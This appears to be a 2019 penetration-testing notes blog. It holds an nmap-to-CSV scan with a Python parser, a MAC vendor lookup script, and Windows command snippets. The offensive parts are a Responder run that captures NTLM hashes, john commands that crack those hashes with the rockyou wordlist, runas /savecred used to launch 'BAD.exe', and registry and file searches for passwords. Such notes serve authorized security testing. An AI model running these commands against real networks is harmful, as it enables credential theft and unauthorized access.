Thursday, October 31, 2019

Nmap Open Web Ports to CSV

Scan the common web ports (80,443,8080,8443) with nmap, turn the grepable output into CSV with sed, and keep only hosts that have at least one of them open:

nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^[:space:]]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open

Example output (columns: ip, hostname, 80, 443, 8080, 8443):

10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed
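The same -oG to CSV conversion in Python, added here as an example and not part of the original post: it parses the grepable Ports: field entry by entry instead of matching fixed positions, fills in ports that nmap folded into an "Ignored State" summary, and keeps the same "only hosts with an open port" filter as the trailing grep. The SAMPLE lines are constructed grepable output, not a real scan.

```python
import csv
import io
import re

WEB_PORTS = (80, 443, 8080, 8443)  # ports scanned above; CSV columns use this order

# One -oG host line: "Host: <ip> (<hostname>)\tPorts: <entries>[\tIgnored State: <s> (<n>)]"
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+(.*)$")
IGNORED_RE = re.compile(r"Ignored State:\s+(\w+)\s+\((\d+)\)")

def parse_grepable(text):
    """Yield (ip, hostname, {port: state}, ignored_state) for each Ports: line.
    "# ..." comments and "Status: Up" lines carry no port data and are skipped."""
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, hostname, rest = m.groups()
        ports_field, _, tail = rest.partition("\t")
        ignored = IGNORED_RE.search(tail)
        states = {}
        for entry in ports_field.split(","):          # e.g. "80/open/tcp//http///"
            fields = entry.strip().split("/")
            if len(fields) >= 2 and fields[0].isdigit():
                states[int(fields[0])] = fields[1]    # state is the second field
        yield ip, hostname, states, (ignored.group(1) if ignored else "")

def grepable_to_csv(text, ports=WEB_PORTS, only_open=True):
    """Return "ip,hostname,<state per port>" rows like the sed pipeline emits.
    Ports nmap folded into "Ignored State: X (N)" get state X, so the column
    count stays fixed even when nmap does not list every scanned port."""
    out = io.StringIO()
    writer = csv.writer(out, lineterminator="\n")
    for ip, hostname, states, ignored in parse_grepable(text):
        row = [states.get(p, ignored or "unknown") for p in ports]
        if only_open and "open" not in row:
            continue                                   # same as the trailing "grep open"
        writer.writerow([ip, hostname] + row)
    return out.getvalue()

# Constructed sample of -oG output (not from a real scan) so the script runs offline.
SAMPLE = "\n".join([
    "Host: 10.99.106.10 (test1.local.com)\tStatus: Up",
    "Host: 10.99.106.10 (test1.local.com)\tPorts: 80/open/tcp//http///, 443/closed/tcp//https///, 8080/closed/tcp//http-proxy///, 8443/closed/tcp//https-alt///",
    "Host: 10.99.106.11 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///, 8080/closed/tcp//http-proxy///, 8443/closed/tcp//https-alt///",
    "Host: 10.99.106.20 ()\tPorts: 80/closed/tcp//http///, 443/closed/tcp//https///, 8080/closed/tcp//http-proxy///, 8443/closed/tcp//https-alt///",
    "Host: 10.99.106.30 ()\tPorts: 443/open/tcp//https///\tIgnored State: filtered (3)",
])
if __name__ == "__main__":
    print(grepable_to_csv(SAMPLE), end="")
```

Feed real output with `nmap ... -oG - | python3 nmap_web_csv.py` by reading sys.stdin instead of SAMPLE.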

Tuesday, October 22, 2019

Sample Responder command

responder -I eth0 -r -b

cd /usr/share/responder/logs

john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt

john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt

Friday, October 18, 2019

Print all MAC Address Vendors around you (arp -a)

# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )

import re
import subprocess

from mac_vendor_lookup import MacLookup, VendorNotFoundError

# Matches a MAC in Windows "aa-bb-cc-dd-ee-ff" or Unix "aa:bb:cc:dd:ee:ff" form,
# which also rules out the "---" separators in arp -a output.
MAC_RE = re.compile(r"^([0-9a-fA-F]{2}[-:]){5}[0-9a-fA-F]{2}$")

arp_output = subprocess.run(["arp", "-a"], capture_output=True, text=True).stdout
print(arp_output)

# One lookup object for the whole run; if every lookup reports "not found",
# run lookup.update_vendors() once to download the current OUI list.
lookup = MacLookup()
for line in arp_output.splitlines():
    for item in line.split():
        if not MAC_RE.match(item):
            continue
        try:
            print(item + ": " + lookup.lookup(item))
        except VendorNotFoundError:
            print(item + ": not found")

View Stored Credentials and Runas

>cmdkey /list

Currently stored credentials:

....

runas /savecred /user:XXXX "c:\BAD.exe"

Search inside Windows Files for passwords

>findstr /s password c:\*.ps1

Password Searching in Registry

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S

REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S


Get File Shares Exposed "net share"

>net share

Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
print$       C:\WINDOWS\system32\spool\drivers  Printer Drivers
ADMIN$       C:\WINDOWS                      Remote Admin